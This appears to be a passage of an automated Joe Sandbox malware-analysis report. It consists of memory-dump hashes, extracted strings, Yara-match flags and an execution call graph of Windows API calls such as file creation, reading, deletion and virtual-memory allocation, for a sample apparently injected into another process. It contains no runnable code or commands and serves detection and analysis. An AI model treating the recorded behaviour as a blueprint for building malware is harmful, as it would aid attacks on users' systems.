                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 529ffaf900eb0e6a10faf8953dbe9441d3d17a8af8cf079f671d2821452c44ec
                                                                                                              • Instruction ID: 1f2d2861f13114dbde7f5a7b6434e80c435ee7e2e8d7f60e672e288f3c8fff92
                                                                                                              • Opcode Fuzzy Hash: 529ffaf900eb0e6a10faf8953dbe9441d3d17a8af8cf079f671d2821452c44ec
                                                                                                              • Instruction Fuzzy Hash: C890023124540403D20071585548707900697D0311F95D421A042456CDD6568A516223
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf5020042eafff3c343a5900ddb3cedca6eab5885529c9a26ae4d0f7db077488
                                                                                                              • Instruction ID: 5ae3addc5637d52eb892636e41b73487e3c6178d62221f7219ccd300f674fb56
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                                                                                                              • Instruction ID: c36ed54a1c50f272d8ce9102c9b1608a40863b64ae524cfb324e400637d69a8b
                                                                                                              • Opcode Fuzzy Hash: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                                                                                                              • Instruction Fuzzy Hash: 2651E8B5A00116BFDF11DB9C889097EFBB8BB48240B548269F5A5E7646D334DE40CBA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                                                                                                              • Instruction ID: 5698160bf4b54df8080d47a94eb3d93264229ccc79995da84207c64c8e45ff63
                                                                                                              • Opcode Fuzzy Hash: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                                                                                                              • Instruction Fuzzy Hash: F451F7B1A00645AECB30DF5CC99497FFBFCEB4C200B1484A9E596D7643EAB4EE408760
                                                                                                              Strings
                                                                                                              • ExecuteOptions, xrefs: 017A46A0
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A4742
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4787
                                                                                                              • Execute=1, xrefs: 017A4713
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4655
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A46FC
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4725
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                                                                                                              • Instruction ID: e0e2a32de2b374f20e02bd3302117b326bee40e747b4f1d5f6bc2b85d6eca8f6
                                                                                                              • Opcode Fuzzy Hash: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                                                                                                              • Instruction Fuzzy Hash: B3513B71600219BAEF25AAA8DC99FEDF7BCEF14348F4401E9DA05AB181E7719E418F50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: 1bb7149d1a0cb93d38ecdca879809e52650bba104c9df50c27eafb636c1206a1
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: 6A81F370E452498EEF25CF6CC8907FEFBB1AF85320F18465AE961E7295C7309840CB91
                                                                                                              Strings
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017A02E7
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017A02BD
                                                                                                              • RTL: Re-Waiting, xrefs: 017A031E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                                                                                                              • Instruction ID: d41e43376ba3f03d8b9d101faf7e22051bc0e2757e27c2e4c0f805d852c8fb15
                                                                                                              • Opcode Fuzzy Hash: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                                                                                                              • Instruction Fuzzy Hash: 99E1BC306087419FD765CF28C884B6AFBE0FB88314F540A6DF9A58B2E1D7B4E944CB52
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 017A7B8E
                                                                                                              • RTL: Re-Waiting, xrefs: 017A7BAC
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017A7B7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                                                                                                              • Instruction ID: 57f9efc374f229f1e96087e10a56573ce7fcd30ea34db358e54a8b17c989daed
                                                                                                              • Opcode Fuzzy Hash: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                                                                                                              • Instruction Fuzzy Hash: 8341E3713047029FD725DE29CC40BAAF7E9EF99710F100A2DF956DB690DB32E9058B91
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 017A72A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017A7294
                                                                                                              • RTL: Re-Waiting, xrefs: 017A72C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                                                                                                              • Instruction ID: e5c7221d74435754e70b1f76a828d022c359c70bfa21036d32797fb35a05964b
                                                                                                              • Opcode Fuzzy Hash: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                                                                                                              • Instruction Fuzzy Hash: 4F41F031704202ABD725DE29CC41BAAFBB9FB95710F100629FD55EB280DB21F84287D1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                                                                                                              • Instruction ID: 60fd25e2c63f144399f9c4e662fcd30ee5bd82674714fdd0ac39bacda7b49c3e
                                                                                                              • Opcode Fuzzy Hash: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                                                                                                              • Instruction Fuzzy Hash: 22315472A00219AFDB20DE2DCC44BEEF7FCEB58610F54455AE949E3245EB309A458FA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction ID: 50e45cf47cb30262fda08364a591631b75d38129fd0e80e2deaa660339a2b138
                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction Fuzzy Hash: 8491E371E002069BEF28CF6DC989ABEFBA5EF44320F54491AE955E72C4E7708981C751
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                                                                                                              • Instruction ID: bd230fedec3294854c65c95dbba2adf87ef4f038640cb517fe25e002e0fe0675
                                                                                                              • Opcode Fuzzy Hash: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                                                                                                              • Instruction Fuzzy Hash: 22811B72D002699BDB31DF54CC45BEEB7B4AB48714F1041DAEA19B7681E7709E84CFA0
                                                                                                              APIs
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 017BCFBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: CallFilterFunc@8
                                                                                                              • String ID: @$@4Cw@4Cw
                                                                                                              • API String ID: 4062629308-3101775584
                                                                                                              • Opcode ID: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
                                                                                                              • Instruction ID: a73438d799a6a6f38e4de533d7fa01d359e0956f42c025574647c7f3f57b4cad
                                                                                                              • Opcode Fuzzy Hash: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
                                                                                                              • Instruction Fuzzy Hash: 0441D071A00225DFCB329FA9C884AADFBB8FF59704F10416AEA14DB258D734D941CB61

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.8%
                                                                                                              Dynamic/Decrypted Code Coverage:4.1%
                                                                                                              Signature Coverage:2.2%
                                                                                                              Total number of Nodes:462
                                                                                                              Total number of Limit Nodes:76
90952->90953 90954 2d93bbe 90953->90954 90954->90916 90957 2d95514 90955->90957 90956 2d9554b 90956->90916 90957->90956 90974 2d88a20 90957->90974 90959 2d9552d 90959->90916 90961 2d8a7b6 90960->90961 90978 2d8e1c0 90961->90978 90963 2d8a828 90965 2d8a9b0 90963->90965 90966 2d8a846 90963->90966 90964 2d8a995 90964->90916 90965->90964 90967 2d8a650 RtlFreeHeap 90965->90967 90966->90964 90983 2d8a650 90966->90983 90967->90965 90970 2d8ab26 90969->90970 90971 2d8e1c0 RtlFreeHeap 90970->90971 90972 2d8abad 90971->90972 90972->90919 90973->90945 90975 2d889eb 90974->90975 90976 2d889f8 GetFileAttributesW 90975->90976 90977 2d88a03 90975->90977 90976->90977 90977->90959 90980 2d8e1e4 90978->90980 90979 2d8e1f1 90979->90963 90980->90979 90981 2d9bb40 RtlFreeHeap 90980->90981 90982 2d8e234 90981->90982 90982->90963 90984 2d8a66d 90983->90984 90987 2d8e250 90984->90987 90986 2d8a773 90986->90966 90988 2d8e274 90987->90988 90989 2d8e31e 90988->90989 90990 2d9bb40 RtlFreeHeap 90988->90990 90989->90986 90990->90989 90533 2d91df0 90534 2d91e0c 90533->90534 90535 2d91e48 90534->90535 90536 2d91e34 90534->90536 90543 2d99b00 90535->90543 90537 2d99b00 NtClose 90536->90537 90539 2d91e3d 90537->90539 90540 2d91e51 90546 2d9bc60 RtlAllocateHeap 90540->90546 90542 2d91e5c 90544 2d99b1a 90543->90544 90545 2d99b2b NtClose 90544->90545 90545->90540 90546->90542 90547 2d99970 90548 2d99a14 90547->90548 90550 2d9999e 90547->90550 90549 2d99a2a NtReadFile 90548->90549 91001 2d907b0 91002 2d907cd 91001->91002 91003 2d84bd0 LdrLoadDll 91002->91003 91004 2d907eb 91003->91004 90551 2d83773 90556 2d883e0 90551->90556 90554 2d8379f 90555 2d99b00 NtClose 90555->90554 90557 2d883fa 90556->90557 90561 2d83783 90556->90561 90562 2d99200 90557->90562 90560 2d99b00 NtClose 90560->90561 90561->90554 90561->90555 90563 2d9921a 90562->90563 90566 4ec35c0 LdrInitializeThunk 90563->90566 90564 2d884ca 90564->90560 90566->90564 90567 2d82de8 90568 2d82e08 90567->90568 90571 2d86930 90568->90571 90570 
2d82e13 90572 2d86963 90571->90572 90573 2d86984 90572->90573 90578 2d99680 90572->90578 90573->90570 90575 2d869a7 90575->90573 90576 2d99b00 NtClose 90575->90576 90577 2d86a29 90576->90577 90577->90570 90579 2d9969a 90578->90579 90582 4ec2ca0 LdrInitializeThunk 90579->90582 90580 2d996c6 90580->90575 90582->90580 90583 2d79f60 90585 2d7a288 90583->90585 90586 2d7a769 90585->90586 90587 2d9b7b0 90585->90587 90588 2d9b7d6 90587->90588 90593 2d741a0 90588->90593 90590 2d9b7e2 90592 2d9b81b 90590->90592 90596 2d95c60 90590->90596 90592->90586 90595 2d741ad 90593->90595 90600 2d83880 90593->90600 90595->90590 90597 2d95cc2 90596->90597 90599 2d95ccf 90597->90599 90618 2d82060 90597->90618 90599->90592 90601 2d8389a 90600->90601 90603 2d838b3 90601->90603 90604 2d9a520 90601->90604 90603->90595 90606 2d9a53a 90604->90606 90605 2d9a569 90605->90603 90606->90605 90611 2d99160 90606->90611 90609 2d9bb40 RtlFreeHeap 90610 2d9a5d9 90609->90610 90610->90603 90612 2d9917a 90611->90612 90615 4ec2c0a 90612->90615 90613 2d991a6 90613->90609 90616 4ec2c1f LdrInitializeThunk 90615->90616 90617 4ec2c11 90615->90617 90616->90613 90617->90613 90619 2d8209b 90618->90619 90634 2d884f0 90619->90634 90621 2d820a3 90622 2d82380 90621->90622 90645 2d9bc20 90621->90645 90622->90599 90624 2d820b9 90625 2d9bc20 RtlAllocateHeap 90624->90625 90626 2d820ca 90625->90626 90627 2d9bc20 RtlAllocateHeap 90626->90627 90628 2d820db 90627->90628 90633 2d82178 90628->90633 90652 2d87090 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 90628->90652 90630 2d84bd0 LdrLoadDll 90631 2d82332 90630->90631 90648 2d985a0 90631->90648 90633->90630 90635 2d8851c 90634->90635 90636 2d883e0 2 API calls 90635->90636 90637 2d8853f 90636->90637 90638 2d88549 90637->90638 90639 2d88561 90637->90639 90641 2d88554 90638->90641 90642 2d99b00 NtClose 90638->90642 90640 2d8857d 90639->90640 90643 2d99b00 NtClose 90639->90643 90640->90621 90641->90621 90642->90641 90644 2d88573 90643->90644 90644->90621 90653 
2d99e00 90645->90653 90647 2d9bc3b 90647->90624 90649 2d98602 90648->90649 90651 2d9860f 90649->90651 90656 2d82390 90649->90656 90651->90622 90652->90633 90654 2d99e1a 90653->90654 90655 2d99e2b RtlAllocateHeap 90654->90655 90655->90647 90672 2d887c0 90656->90672 90658 2d828f3 90658->90651 90659 2d823b0 90659->90658 90676 2d917d0 90659->90676 90662 2d825c7 90684 2d9cd10 90662->90684 90663 2d8240e 90663->90658 90679 2d9cbe0 90663->90679 90666 2d825dc 90668 2d82629 90666->90668 90690 2d80eb0 90666->90690 90668->90658 90670 2d80eb0 LdrInitializeThunk 90668->90670 90693 2d88760 90668->90693 90669 2d82777 90669->90668 90671 2d88760 LdrInitializeThunk 90669->90671 90670->90668 90671->90669 90673 2d887cd 90672->90673 90674 2d887ee SetErrorMode 90673->90674 90675 2d887f5 90673->90675 90674->90675 90675->90659 90677 2d9bac0 NtAllocateVirtualMemory 90676->90677 90678 2d917f1 90677->90678 90678->90663 90680 2d9cbf0 90679->90680 90681 2d9cbf6 90679->90681 90680->90662 90682 2d9bc20 RtlAllocateHeap 90681->90682 90683 2d9cc1c 90682->90683 90683->90662 90685 2d9cc80 90684->90685 90686 2d9ccdd 90685->90686 90687 2d9bc20 RtlAllocateHeap 90685->90687 90686->90666 90688 2d9ccba 90687->90688 90689 2d9bb40 RtlFreeHeap 90688->90689 90689->90686 90697 2d99d70 90690->90697 90694 2d88773 90693->90694 90702 2d99060 90694->90702 90696 2d8879e 90696->90668 90698 2d99d8d 90697->90698 90701 4ec2c70 LdrInitializeThunk 90698->90701 90699 2d80ecf 90699->90669 90701->90699 90703 2d990db 90702->90703 90705 2d9908e 90702->90705 90707 4ec2dd0 LdrInitializeThunk 90703->90707 90704 2d99100 90704->90696 90705->90696 90707->90704 91005 2d86220 91006 2d88760 LdrInitializeThunk 91005->91006 91007 2d86250 91005->91007 91006->91007 91009 2d8627c 91007->91009 91010 2d886e0 91007->91010 91012 2d88724 91010->91012 91011 2d88745 91011->91007 91012->91011 91017 2d98e30 91012->91017 91014 2d88735 91015 2d88751 91014->91015 91016 2d99b00 NtClose 91014->91016 91015->91007 91016->91011 91018 2d98e5e 91017->91018 
91019 2d98eaa 91017->91019 91018->91014 91022 4ec4650 LdrInitializeThunk 91019->91022 91020 2d98ecf 91020->91014 91022->91020 91023 2d877a0 91024 2d877b9 91023->91024 91027 2d8780c 91023->91027 91026 2d99b00 NtClose 91024->91026 91024->91027 91025 2d87944 91028 2d877d4 91026->91028 91027->91025 91034 2d86bc0 NtClose LdrInitializeThunk LdrInitializeThunk 91027->91034 91033 2d86bc0 NtClose LdrInitializeThunk LdrInitializeThunk 91028->91033 91030 2d8791e 91030->91025 91035 2d86d90 NtClose LdrInitializeThunk LdrInitializeThunk 91030->91035 91033->91027 91034->91030 91035->91025 90708 2d99a60 90709 2d99ad1 90708->90709 90711 2d99a8b 90708->90711 90710 2d99ae7 NtDeleteFile 90709->90710 91036 2d960a0 91037 2d96105 91036->91037 91038 2d96140 91037->91038 91041 2d91aa0 91037->91041 91040 2d96122 91042 2d91ab7 91041->91042 91043 2d91a45 91041->91043 91044 2d99b00 NtClose 91043->91044 91045 2d91a8c 91044->91045 91045->91040 91046 2d90220 91047 2d9023f 91046->91047 91049 2d97b00 91046->91049 91050 2d97b65 91049->91050 91051 2d97b94 91050->91051 91054 2d8dfc0 91050->91054 91051->91047 91053 2d97b76 91053->91047 91055 2d8dfbb 91054->91055 91058 2d8df30 91054->91058 91055->91053 91056 2d8dfac 91056->91053 91057 2d954b0 GetFileAttributesW 91057->91058 91058->91056 91058->91057 90712 4ec2ad0 LdrInitializeThunk

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d$&B$)$*#$1$:$:}$OV$Q$U$]$_$_-$_<$b*$e$i3$i:$v2
                                                                                                              • API String ID: 0-3217503214
                                                                                                              • Opcode ID: 7cbec4fbcd39e802f28624e720d538de91ffa90ce2ab2b3395865f71e5ec2323
                                                                                                              • Instruction ID: 6d40ffd928175bec5fbccdfd82f13228dee43bf5bc7f9bc818c3f214a381ca0f
                                                                                                              • Opcode Fuzzy Hash: 7cbec4fbcd39e802f28624e720d538de91ffa90ce2ab2b3395865f71e5ec2323
                                                                                                              • Instruction Fuzzy Hash: 7432AEB0D05669CBEB64CF44C898BEDBBB2BB44308F1081D9D4496B381EB795E89CF54
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02D8CD34
                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02D8CD6F
                                                                                                              • FindClose.KERNELBASE(?), ref: 02D8CD7A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3541575487-0
                                                                                                              • Opcode ID: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                                                              • Instruction ID: 3670fec2f8bc2198452eaa639ff6806aca6954d8e78a0454814a7d1618c1caa4
                                                                                                              • Opcode Fuzzy Hash: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                                                              • Instruction Fuzzy Hash: 91317371610308BBDB24EB60CC85FEF777CEB44744F104199B909A6290EB70AE45CBB0
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?,?,?), ref: 02D99908
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                                                              • Instruction ID: a641c863541fbcb24f27cee02132c5afaee0dcab1e500e1f2a1098e5431ddae6
                                                                                                              • Opcode Fuzzy Hash: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                                                              • Instruction Fuzzy Hash: 2E31E4B5A01248AFCB14DF98D880EEFB7B9EF88704F108219F908A7340D730A851CFA0
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?), ref: 02D99A53
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                                                              • Instruction ID: 651284c2a97ffa4ce581011bf77203f9e8823c11ea8f1569d16a0e95e967b647
                                                                                                              • Opcode Fuzzy Hash: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                                                              • Instruction Fuzzy Hash: 6B31D6B5A00248ABDB14DF98D881EEFB7B9EF88714F108219FD18A7344D770A951CFA1
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(02D8240E,?,59BA9130,00000000,00000004,00003000,?,?,?,?,?,02D9860F,02D8240E,?,?,02D9BAEE), ref: 02D99D12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                                                              • Instruction ID: 2a7efe71b752712a6f632bc45717b453e4c58aa3722e8399ab94c547675410d2
                                                                                                              • Opcode Fuzzy Hash: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                                                              • Instruction Fuzzy Hash: C721E8B5A00249ABDB14DF98DC41EAFB7B9EF88704F108519FD08AB344D674A951CFA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                                                              • Instruction ID: fa823154da1240cf8edf3b2710b2a7b4c69ae9860f65c50baf921425b9fcfd30
                                                                                                              • Opcode Fuzzy Hash: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                                                              • Instruction Fuzzy Hash: EF11A3316006497BDB20EB98CC41FEFB76DDF85704F004209F908AB280EA747945CBB1
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02D99B34
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                                              • Instruction ID: 3b925cdafb9357968ec82b1fb2880c6b6fe128d98c48f56cfe77a31be291fcd6
                                                                                                              • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                                              • Instruction Fuzzy Hash: 63E08C3A2012047BD620FA69CC40FDBB7ADDFC6B54F004419FA1CAB242D6B0B9418BF1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
